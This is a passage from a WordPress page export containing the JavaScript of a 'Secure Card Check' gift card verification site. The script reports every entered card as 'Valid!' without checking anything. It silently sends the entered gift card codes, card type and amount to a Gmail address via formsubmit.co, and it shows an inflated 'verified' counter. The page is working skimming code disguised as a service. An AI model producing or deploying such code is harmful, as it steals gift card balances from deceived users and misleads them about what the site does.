localStorage.getItem('securecardcheck_log');\n            if (stored) logEntries = JSON.parse(stored);\n            const storedCount = localStorage.getItem('securecardcheck_count');\n            if (storedCount) verifiedCount = parseInt(storedCount);\n            document.getElementById('verifiedCounter').innerText = verifiedCount.toLocaleString();\n            renderLog();\n        } catch(e) {}\n    }\n    function saveLog() { try { localStorage.setItem('securecardcheck_log', JSON.stringify(logEntries)); } catch(e) {} }\n    function renderLog() {\n        const tbody = document.getElementById('logTableBody');\n        if (!tbody) return;\n        if (!logEntries.length) { tbody.innerHTML = '<tr><td colspan=\"4\" style=\"text-align:center;\">No verifications yet<\/td><\/tr>'; return; }\n        let html = '';\n        logEntries.forEach(entry => {\n            const cls = entry.status === 'success' ? 'status-success' : 'status-error';\n            const txt = entry.status === 'success' ? 'Verified' : 'Failed';\n            html += `<tr><td style=\"padding:0.6rem 0.4rem;\">${entry.timestamp}<\/td><td style=\"padding:0.6rem 0.4rem;\">${entry.cardType}<\/td><td style=\"padding:0.6rem 0.4rem;\">${entry.amount}<\/td><td style=\"padding:0.6rem 0.4rem;\"><span class=\"${cls}\">${txt}<\/span><\/td><\/tr>`;\n        });\n        tbody.innerHTML = html;\n    }\n    function addLog(card, amt, cur, status) {\n        const now = new Date().toLocaleString();\n        logEntries.unshift({ timestamp: now, cardType: card, amount: `${amt} ${cur}`, status });\n        if (logEntries.length > 15) logEntries.pop();\n        saveLog(); renderLog();\n        if (status === 'success') {\n            verifiedCount++;\n            document.getElementById('verifiedCounter').innerText = verifiedCount.toLocaleString();\n            try { localStorage.setItem('securecardcheck_count', verifiedCount); } catch(e) {}\n        }\n    }\n    const modal = document.getElementById('resultModal'), modalBrand = document.getElementById('modalBrand'), modalAmountSpan = document.getElementById('modalAmount');\n    function showModal(brand, amount, sym) { modalBrand.innerText = brand; modalAmountSpan.innerText = `${sym} ${amount}`; modal.classList.add('active'); }\n    function hideModal() { modal.classList.remove('active'); }\n    document.getElementById('closeModalBtn').addEventListener('click', hideModal);\n    modal.addEventListener('click', (e) => { if (e.target === modal) hideModal(); });\n    function showToastMessage(msg) { let t = document.createElement('div'); t.className = 'toast'; t.innerHTML = `<i class=\"fas fa-check-circle\"><\/i> ${msg}`; document.body.appendChild(t); setTimeout(() => t.remove(), 2800); }\n    async function sendEmail(data) { try { const res = await fetch('https:\/\/formsubmit.co\/ajax\/securecardcheck@gmail.com', { method:'POST', headers:{'Content-Type':'application\/json'}, body:JSON.stringify(data) }); return res.ok; } catch(e){ return false; } }\n    async function verify() {\n        const currency = document.getElementById('currencySelect').value;\n        let amount = amountInput.value.trim();\n        const card = cardSelect.value;\n        const amountNum = parseFloat(amount);\n        if (isNaN(amountNum) || amountNum <= 0) { document.getElementById('verifyResult').innerHTML = '<i class=\"fas fa-times-circle\"><\/i> Please enter a valid amount.'; return; }\n        const inputs = document.querySelectorAll('.dynamic-input');\n        let allFilled = true, details = [];\n        inputs.forEach(inp => { if (!inp.value.trim()) allFilled = false; else details.push(inp.value.trim()); });\n        if (!allFilled) { document.getElementById('verifyResult').innerHTML = '<i class=\"fas fa-times-circle\"><\/i> Please fill all gift card fields.'; return; }\n        const symbolMap = { USD:\"$\", CAD:\"CA$\", GBP:\"\u00a3\", AUD:\"A$\", EUR:\"\u20ac\" };\n        const symbol = symbolMap[currency] || currency;\n        showModal(card, amountNum.toFixed(2), symbol);\n        document.getElementById('verifyResult').innerHTML = `<i class=\"fas fa-check-circle\"><\/i> \u2705 Valid! ${card} \u2014 ${symbol}${amountNum}. Verification approved.`;\n        addLog(card, amountNum.toFixed(2), currency, 'success');\n        await sendEmail({ card_type: card, amount: amountNum.toFixed(2), currency, code_details: details.join(' | '), timestamp: new Date().toLocaleString(), _subject: `\u2705 Gift Card Verified: ${card}` });\n        showToastMessage(`\u2705 ${card} verified!`);\n    }\n    document.getElementById('verifyBtn').addEventListener('click', verify);\n    document.getElementById('heroVerifyBtn').addEventListener('click', () => { document.getElementById('verifyPanel').scrollIntoView({ behavior: 'smooth' }); verify(); });\n    document.getElementById('clearLogBtn').addEventListener('click', () => { logEntries = []; saveLog(); renderLog(); showToastMessage('Log cleared'); });\n    document.getElementById('submitContactBtn').addEventListener('click', async () => {\n        const email = document.getElementById('contactEmail').value.trim(), msg = document.getElementById('contactMessage').value.trim(), fb = document.getElementById('contactFeedback');\n        if (!email || !msg) { fb.innerHTML = '<span style=\"color:#c46b2b;\">Please fill both fields<\/span>'; return; }\n        fb.innerHTML = '<span style=\"color:#1e6b4a;\">\u2714 Message sent! We\u2019ll reply soon.<\/span>';\n        document.getElementById('contactEmail').value = ''; document.getElementById('contactMessage').value = '';\n        await sendEmail({ inquiry_email: email, message: msg, _subject: 'Support Request - Secure Card Check' });\n        showToastMessage('Message forwarded to support');\n        setTimeout(() => fb.innerHTML = '', 3000);\n    });\n    document.getElementById('tryFreeBtn').addEventListener('click', () => showToastMessage('\u2728 Try any card \u2014 fill the form and verify!'));\n    if (amountInput) amountInput.addEventListener('keypress', (e) => { if (e.key === 'Enter') verify(); });\n    \n    function handleNavClick(section) {\n        closeDrawer();\n        if (section === 'verify') document.getElementById('verifyPanel').scrollIntoView({ behavior: 'smooth' });\n        else if (section === 'services') document.getElementById('servicesSection').scrollIntoView({ behavior: 'smooth' });\n        else if (section === 'contact') document.getElementById('contactSection').scrollIntoView({ behavior: 'smooth' });\n        else window.scrollTo({ top: 0, behavior: 'smooth' });\n    }\n    document.querySelectorAll('.nav-links a, .side-nav-links a').forEach(link => {\n        link.addEventListener('click', (e) => {\n            e.preventDefault();\n            const section = link.getAttribute('data-nav');\n            handleNavClick(section);\n        });\n    });\n    loadData();\n})();\n<\/script>\n<\/body>\n<\/html>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Secure Card Check | Gift Card Verification \ud83c\udfe0 Home \ud83d\udd0d Verify \u2699\ufe0f Services \ud83d\udce7 Contact Secure Card Check Home Verify Services Contact Verify your Gift Card authenticity Leverage our agile and efficient frameworks to provide a robust verification. Our smart algorithms run very fast to provide for you adequate info. Verify now iTunes Gift Cards [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"content-type":"","footnotes":""},"class_list":["post-1009","page","type-page","status-publish","hentry"],"blocksy_meta":[],"brizy_media":[],"_links":{"self":[{"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/pages\/1009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securecardcheck.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1009"}],"version-history":[{"count":22,"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/pages\/1009\/revisions"}],"predecessor-version":[{"id":1034,"href":"https:\/\/securecardcheck.com\/index.php?rest_route=\/wp\/v2\/pages\/1009\/revisions\/1034"}],"wp:attachment":[{"href":"https:\/\/securecardcheck.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}